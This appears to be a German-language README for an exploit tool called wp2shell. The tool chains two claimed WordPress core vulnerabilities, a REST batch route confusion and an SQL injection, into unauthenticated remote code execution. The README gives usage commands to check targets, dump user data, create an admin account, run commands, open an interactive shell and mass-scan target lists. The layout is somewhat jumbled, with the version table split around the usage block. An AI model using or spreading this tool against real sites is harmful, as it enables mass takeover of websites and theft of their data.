
wp2shell - WordPress RCE & PoC (CVE-2026-63030 + CVE-2026-60137)
Nicht authentifizierte Remote-Code-Ausführung im WordPress Core
von: JohenLastGen
Dieses Tool verkettet zwei kritische WordPress-Sicherheitslücken, um eine nicht authentifizierte RCE zu erreichen:
| Sicherheitslücke | CVE | Beschreibung |
|---|---|---|
| REST Batch Route Confusion | CVE-2026-63030 | Umgeht die Validierung, schleust SQLi-Payload ein |
| WP_Query author__not_in SQLi | CVE-2026-60137 | Rohe String-Injektion → SQL-Ausführung |
Auswirkung: Nicht authentifizierter Angreifer → Admin erstellen → Befehle ausführen
| Versionsbereich | Status |
|---|---|
| WordPress 6.9.0 - 6.9.4 | ✅ VERWUNDBAR (Vollständige RCE-Kette) |
#options:
-h, --help show this help message and exit
python3 wp2shell.py --help
# 1. Check if target is vulnerable
python3 wp2shell.py check https://target.com
# 2. Extract data (fingerprint/users)
python3 wp2shell.py read https://target.com --preset fingerprint
python2 wp2shell.py read https://target.com --preset users
# 3. RCE - Create admin & execute command (NO CREDENTIALS NEEDED!)
python3 wp2shell.py shell https://target.com --cmd "id"
# 4. Interactive shell
python3 wp2shell.py shell https://target.com --interactive
# 5. Mass scan multiple targets
python3 wp2shell.py scan targets.txt --threads 50 --prove --json results.json
| WordPress 7.0.0 - 7.0.1 | ✅ VERWUNDBAR (Vollständige RCE-Kette) |
| WordPress 6.8.0 - 6.8.5 | ⚠️ Nur SQLi (erfordert ein unterstützendes Plugin) |
| WordPress 6.9.5, 7.0.2+ | ❌ Gepatcht |